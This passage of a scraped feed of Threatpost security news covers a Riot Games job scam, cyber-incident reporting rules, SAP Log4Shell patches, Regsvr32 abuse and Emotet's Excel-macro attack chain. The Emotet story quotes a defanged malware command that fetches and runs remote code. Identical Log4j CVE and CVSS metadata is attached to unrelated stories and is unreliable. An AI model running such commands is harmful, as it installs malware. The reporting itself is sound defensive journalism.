GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T13:53:59", "description": "You know that hazy window that\u2019s been obscuring the cyber threat landscape, leaving the feds squinting to try to see what\u2019s really going on?\n\nThe government has recently pulled out some squeegees.\n\nCase in point: the [government spending deal](<https://www.natlawreview.com/article/legislation-requiring-reporting-certain-cyber-incidents-enacted>) that President Biden signed into law on Friday. The bill mandates that critical infrastructure operators report a significant cyber incident within 72 hours and a ransomware payment in 24 hours.\n\n## It\u2019s About Time\n\nAs Politico [reported](<https://subscriber.politicopro.com/article/2022/03/cyber-incident-reporting-mandate-passes-congress-in-spending-bill-00016470>), senior government officials and cyber policy watchers said the legislation is long overdue. As it is, they\u2019ve long warned that federal cyber defenders don\u2019t have nearly enough information about the digital threat landscape.\n\n\u201cThis is the main thing that we\u2019ve struggled with forever,\u201d said Jonathan Reiber, senior director for cybersecurity strategy & policy at the cybersecurity company [AttackIQ](<https://attackiq.com/>) and former chief strategy officer for cyber policy for the Obama administration. \u201cAnne Neuberger, the White House deputy national security advisor for cyber security, after the [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) intrusion, she said, \u2018Look, we lack visibility into how the adversaries are behaving within private sector networks,'\u201d he noted.\n\n## Feds: The Only Ones Who Can Retaliate Against Nation States\n\nThe timing is suggestive. As it is, the new mandates coincide with [proposals](<https://www.jdsupra.com/legalnews/sec-proposes-new-rules-to-enhance-8659099/>) recently issued by the Securities and Exchange Commission (SEC) that would require some financial firms and listed companies to report cyberattacks to the regulator, create detailed plans for responding to hacks, and explain how they manage cybersecurity at all levels.\n\nPadraic O\u2019Reilly, financial firm and public company cyber risk advisor and co-founder of cyber risk management firm [CyberSaint](<https://www.cybersaint.io/>), is working directly with the financial services industry and public companies to understand and comply with these potential new reporting and board requirements. If enacted as written, he told Threatpost on Wednesday, the SEC\u2019s proposed rules would substantially complicate how thousands of companies track, handle and report cyberattacks.\n\nIn these times of intense cyber aggression from nation states, the government has to step up, Reiber said. After all, it\u2019s the only one who can.\n\n\u201cThe government is the only one who can impose costs externally on a country that\u2019s doing something to the United States,\u201d he said in this week\u2019s Threatpost podcast.\n\n\u201cConstitutionally, it\u2019s the duty of the executive branch [and [U.S. Cyber Command](<https://www.cybercom.mil/>)] to provide for the nation\u2019s defense. You don\u2019t want companies having to go up against a nation state on their own,\u201d Reiber said.\n\nThe new mandates will help, he said. They\u2019ll help the government to assume the burden of risk when it comes to providing a counter offense operation \u2013 if it\u2019s required.\n\nRegarding the difference between the SEC proposals and the spending bill, O\u2019Reilly explained that \u201cThe SEC is out in front of the wider issue of transparency vs. the Cyber Reporting Bill \u2026 focuses more on the nuts and bolts of reporting these attacks\u201d to the Department of Homeland Security, he told Threatpost via email.\n\nThe SEC is going to address \u201cseveral incidents that weren\u2019t reported correctly,\u201d he said, and shows \u201ctailwinds around where future cybersecurity legislation will be heading in terms of public disclosure of cyber posture,\u201d he said.\n\nIn this week\u2019s podcast, Reiber took a look at a number of questions on the spending bill\u2019s reporting mandates, including what should and shouldn\u2019t be considered to be a \u201csignificant\u201d cyber incident, why strategic public and private sector partnerships will be vital, and more \u2013 including a big \u201chuzzah!\u201d regarding a nice shot in the arm for for the Cybersecurity and Infrastructure Security Agency (CISA): namely, a $568 million increase above last year\u2019s funding level that [surpasses](<https://www.cisa.gov/news/2022/03/11/statement-cisa-director-easterly-passage-cyber-incident-reporting-legislation>) the amount requested by the president.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031522_Jonathan_Reiber_Attack_IQ_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_**[ **_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-17T13:00:38", "type": "threatpost", "title": "Reporting Mandates to Clear Up Feds\u2019 Hazy Look into Threat Landscape \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-17T13:00:38", "id": "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "href": "https://threatpost.com/reporting-mandates-to-clear-up-feds-hazy-look-into-threat-landscape-podcast/178947/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besidea Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) \u200b\u200b21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the Xstream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Site Forgery Request vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. \u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patters. In this case, Regsvr32 is aMicrosoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls, which are code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. \u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are types that contain embedded macros. During the attack, these usually download or execute a malicious payload from the URL using the formulas in the macros.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format data or Composite Document (.DOC, .DOCX or .DOCM files embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. However, researchers noted that security teams can monitor for a couple of specific behaviors in order to track its activity:\n\n * Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;\n * And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector\u2014discovered on Dec. 21 and still active\u2013delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion dollars, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat.](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>)\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other types of tactics as part of novel attack methods..\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. \u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER 